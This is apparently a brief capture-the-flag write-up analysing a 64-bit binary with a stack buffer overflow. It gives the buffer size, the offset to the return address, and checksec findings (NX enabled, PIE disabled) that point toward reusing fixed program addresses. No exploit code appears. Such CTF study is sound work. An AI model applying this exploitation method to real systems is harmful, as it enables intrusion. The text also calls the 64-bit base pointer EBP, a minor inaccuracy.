Here's the look when executing the binary

The buffer overflow exist after inputing the second question.

If we decompile the binary with ghidra, we will see the function that been called when the program start from main function.

After the snowman function ended, it call another function named investigate().

The buffer of the variable are 64 byte long

This is 64 bit executable file, so if we cant to overwrite the return address, we must add extra 8 bytes for EBP.

If we check the security with checksec, we can see if the NX are enabled so we couldn't simply put shellcode on it. But the PIE are disabled so we can get the actual address on the program.